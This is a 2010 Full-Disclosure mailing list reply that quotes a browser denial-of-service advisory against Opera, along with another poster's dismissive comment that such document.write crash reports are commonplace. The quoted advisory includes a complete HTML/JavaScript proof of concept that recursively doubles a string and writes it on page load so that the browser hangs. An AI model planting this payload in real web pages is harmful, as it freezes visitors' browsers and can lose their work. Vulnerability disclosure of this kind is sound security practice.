Thanks .Jeff for all your comment so how to fix that On Tue, Mar 2, 2010 at 8:42 PM, Jeff Williams <[email protected]>wrote:
> You gotta be joking, this is probably the 3000th DoS "advisory" for > document.write. > > Guess what sparky, even Jeremy Brown didn't post that one. > > Thus no surprise exploit-db post this kind of shit. > > > 2010/3/3 information security <[email protected]> > >> ====================================================================== >> >> >> Opera (plenitude String )Denial of Service Exploit >> >> ======================================================================= >> >> >> by >> >> Asheesh Kumar Mani Tripathi >> >> >> # code by Asheesh kumar Mani Tripathi >> >> # email [email protected] >> >> >> # company www.aksitservices.co.in >> >> # Credit by Asheesh Anaconda >> >> >> #Download http://www.opera.com/download/ >> >> >> >> #Background >> >> Opera is a popular internet browser :) >> >> #Vulnerability >> This bug is a typical result when attacker try to write plenitude String in >> document.write() function .User interaction is required to >> >> >> exploit this vulnerability in that the target must visit a malicious >> web page. >> >> >> >> #Impact >> Browser doesn't respond any longer to any user input, all tabs are no >> longer accessible, your work if any might be lost. >> >> >> >> >> #Proof of concept >> copy the code in text file and save as "asheesh.html" open in Mozilla Firefox >> >> ======================================================================================================================== >> >> >> asheesh.html >> ======================================================================================================================== >> >> <html> >> >> >> <title>asheesh kumar mani tripathi</title> >> Asheesh kumar Mani Tripathi >> <head> >> >> <script> >> >> >> >> function asheesh () >> { >> var i , anaconda = "XXXX" >> for(i=24;i >0 ;--i) >> >> >> { >> anaconda=anaconda+anaconda; >> } >> >> document.write(anaconda); >> >> asheesh(); >> >> } >> asheesh(); >> >> </script> >> </head> >> >> <body onLoad="asheesh()"></body> >> >> >> </html> >> >> >> >> ======================================================================================================================== >> Why do you worry without cause? Whom do you fear without reason? Who can >> kill you? >> >> >> The soul is neither born, nor does it die. >> >> >> #If you have any questions, comments, or concerns, feel free to contact me. >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
